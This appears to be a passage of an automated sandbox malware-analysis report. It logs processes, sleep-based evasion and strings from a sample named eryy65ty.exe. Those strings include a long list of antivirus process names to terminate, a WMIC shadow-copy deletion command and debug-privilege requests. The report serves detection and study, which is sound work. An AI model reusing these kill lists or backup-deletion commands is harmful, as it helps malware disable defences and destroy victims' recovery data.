Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: eryy65ty.exe, 00000020.00000000.1772450953.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 00000028.00000000.1925547868.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe, 0000002B.00000000.2010314184.000000000030B000.00000002.00000001.01000000.00000008.sdmp, eryy65ty.exe.29.drBinary or memory string: COULD NOT CREATE CHILD PROCESSWOW64DISABLEWOW64FSREDIRECTIONKERNEL32.DLLWOW64REVERTWOW64FSREDIRECTIONABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\WMIC.EXE\..\\WBEM\\SYSTEM32\\WINDOWS\C:\SHADOWCOPY DELETEAVPMAPP.EXE,ECONCEAL.EXE,SECHEALTHUI.EXE,RUNTIMEBROKER.EXE,ESCANMON.EXE,ESCANPRO.EXE,TRAYSSER.EXE,TRAYICOS.EXE,ECONSER.EXE,VIEWTCP.EXE,FSHDLL64.EXE,FSGK32.EXE,FSHOSTER32.EXE,FSMA32.EXE,FSORSP.EXE,FSSM32.EXE,FSM32.EXE,TRIGGER.EXE,FPROTTRAY.EXE,FPWIN.EXE,FPAVSERVER.EXE,AVK.EXE,GDBGINX64.EXE,AVKPROXY.EXE,GDSCAN.EXE,AVKWCTLX64.EXE,AVKSERVICE.EXE,AVKTRAY.EXE,GDKBFLTEXE32.EXE,GDSC.EXE,VIRUSUTILITIES.EXE,GUARDXSERVICE.EXE,GUARDXKICKOFF_X64.EXE,IPTRAY.EXE,FRESHCLAM.EXE,FRESHCLAMWRAP.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,MPCMDRUN.EXE,NANOSVC.EXE,NANOAV.EXE,NNF.EXE,NVCSVC.EXE,NBROWSER.EXE,NSEUPDATESVC.EXE,NFSERVICE.EXE,CMD.EXETASKKILL/IMNWSCMON.EXE,NJEEVES2.EXE,NVCOD.EXE,NVOY.EXE,ZLHH.EXE,ZLH.EXE,NPROSEC.EXE,ZANDA.EXE,NS.EXE,ACS.EXE,OP_MON.EXE,PSANHOST.EXE,PSUAMAIN.EXE,PSUASERVICE.EXE,AGENTSVC.EXE,BDSSVC.EXE,EMLPROXY.EXE,OPSSVC.EXE,ONLINENT.EXE,QUHLPSVC.EXE,SAPISSVC.EXE,SCANNER.EXE,SCANWSCS.EXE,SCPROXYSRV.EXE,SCSECSVC.EXE,SUPERANTISPYWARE.EXE,SASCORE64.EXE,SSUPDATE64.EXE,SUPERDELETE.EXE,SASTASK.EXE,K7RTSCAN.EXE,K7FWSRVC.EXE,K7PSSRVC.EXE,K7EMLPXY.EXE,K7TSECURITY.EXE,K7AVSCAN.EXE,K7CRVSVC.EXE,K7SYSMON.EXE,K7TSMAIN.EXE,K7TSMNGR.EXE,UIWINMGR.EXE,UIWATCHDOG.EXE,UISEAGNT.EXE,PTWATCHDOG.EXE,PTSVCHOST.EXE,PTSESSIONAGENT.EXE,COREFRAMEWORKHOST.EXE,CORESERVICESHELL.EXE,UIUPDATETRAY.EXE,VIPREUI.EXE,SBAMSVC.EXE,SBAMTRAY.EXE,SBPIMSVC.EXE,BAVHM.EXE,BAVSVC.EXE,BAVTRAY.EXE,BAV.EXE,BAVWEBCLIENT.EXE,BAVUPDATER.EXE,MCSHIELDCCC.EXE,MCSHIELDRTM.EXE,MCSHIELDDS.EXE,MCS-UNINSTALL.EXE,SDSCAN.EXE,SDFSSVC.EXE,SDWELCOME.EXE,SDTRAY.EXE,UNTHREAT.EXE,UTSVC.EXE,FORTICLIENT.EXE,FCAPPDB.EXE,FCDBLOG.EXE,FCHELPER64.EXE,FMON.EXE,FORTIESNAC.EXE,FORTIPROXY.EXE,FORTISSLVPNDAEMON.EXE,FORTITRAY.EXE,FORTIFW.EXE,FORTICLIENT_DIAGNOSTIC_TOOL.EXE,AV_TASK.EXE,CERTREG.EXE,FILMSG.EXE,FILUP.EXE,FILWSCC.EXE,FILWSCC.EXE,PSVIEW.EXE,QUAMGR.EXE,QUAMGR.EXE,SCHMGR.EXE,SCHMGR.EXE,TWSSCAN.EXE,TWSSRV.EXE,USERREG.EXESEDEBUGPRIVILEGECOULD NOT SET SE_DEBUG_NAME PRIVILEGE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-client-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-drivers-migration-replacement.man
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened / queried: D:\sources\replacementmanifests\microsoft-hyper-v-migration-replacement.man
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5468Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4345Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3374Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1382Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5055Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2743Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7902
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 741
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5663
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fjeljies.cplJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 3374 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep count: 1382 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 5055 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404Thread sleep time: -21213755684765971s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5084Thread sleep count: 2743 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4908Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1244Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2624Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep count: 7902 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep count: 741 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8488Thread sleep count: 5663 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8488Thread sleep count: 4102 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8520Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8544Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 8664Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 8664Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 9072Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 5408Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 8544Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 4976Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 4976Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 4976Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exe TID: 824Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeThread delayed: delay time: 922337203685477
